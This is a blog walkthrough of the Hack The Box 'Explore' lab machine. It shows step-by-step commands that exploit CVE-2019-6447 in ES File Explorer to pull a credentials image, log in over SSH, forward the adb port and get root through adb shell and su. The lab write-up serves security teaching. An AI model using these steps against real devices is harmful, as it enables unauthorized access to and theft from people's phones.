top of page



As usual, let's start with nmap:

nmap -sV -Pn -p-

I googled the following:

  • port 5555 android --> adb (android debug bridge)

  • port 5977 android --> found out there is android vulnerability in ES file explorer - CVE-2019-6447. Basically this vulnerability allow attackers on the same network to execute applications and read files on the android!

From your attackers' machine do the following:

Go to exploit database

Click on Search EDB

and type 2019-6447 in the CVE field

Click on the exploit

Download the exploit

Go to your Downloads folder:

cd Downloads

Let's try to run this exploit using:


Looks like we need to add a command followed by the IP. If we go back to the exploit on the exploit-db website, it tells us we can use the command listPics to list all the pictures on the android so let's try that:

python3 listPics

Looks like there is an interesting picture called creds.jpg

Let's try to get this file using getFile:

python3 getFile /storage/emulated/0/DCIM/creds.jpg

The file has been downloaded on our machine as out.dat, let's check it out:

When we open the file we see the following:

Looks like a password for username kristi:


We can see from the nmap that port 2222 is open, which is ssh. So let's try to ssh using these credentials:

ssh kristi@ -p 2222

Type yes and press enter

enter the password we just found


We are in!



cd sdcard

cat user.txt


Congratulations! You got the user flag!

cd ..

Let's find out on which port the android is listening by typing:

netstat -tulpn | grep LISTEN

We can see port 5555 is listening.

Port forwarding

What is local port forwarding:

Local port forwarding is configured using the -L option:

    ssh -L     5555:machine2:5555    machine1

This opens a connection on the machine1 and forwards any connection to port 5555 on machine1 to port 5555 on machine2

For our case let's use it and type:

    ssh -L     5555:localhost:5555       kristi@IP -p 2222

This opens a connection to htb target machine (explore machine), and forwards any connection to port 5555 on the machine to port 5555 on my localhost (VM)

We know that our target (htb machine) is listening on port 5555 (netstat told us)

Open a new command prompt on your VM

ssh -L     5555:localhost:5555       kristi@ -p 2222

Enter the password we found earlier



ADB - Android Debug Bridge is a command line tool that allow you to communicate with an android device. It is used by developers mainly to install or debug apps, and it also comes with a unix shell that can be used to run several commands on the device.

An Android device emulator is just a virtual device that runs on your computer that allow you to develop and test your android app without using a physical android device.

Open a new command prompt on your VM

sudo apt install adb

Press Y to continue

sudo apt-get update
sudo apt install adb

press Y to continue.

This time it worked, we have installed adb successfully.

adb devices

adb connect localhost:5555

adb devices

adb shell
adb localhost shell
adb -s localhost shell


The su command switches to the super user – or root user


we are now root!


cd data

cat root.txt


Congratulations! You got the root flag!

223 views0 comments

Recent Posts

See All





Rated 0 out of 5 stars.
No ratings yet

Commenting has been turned off.
bottom of page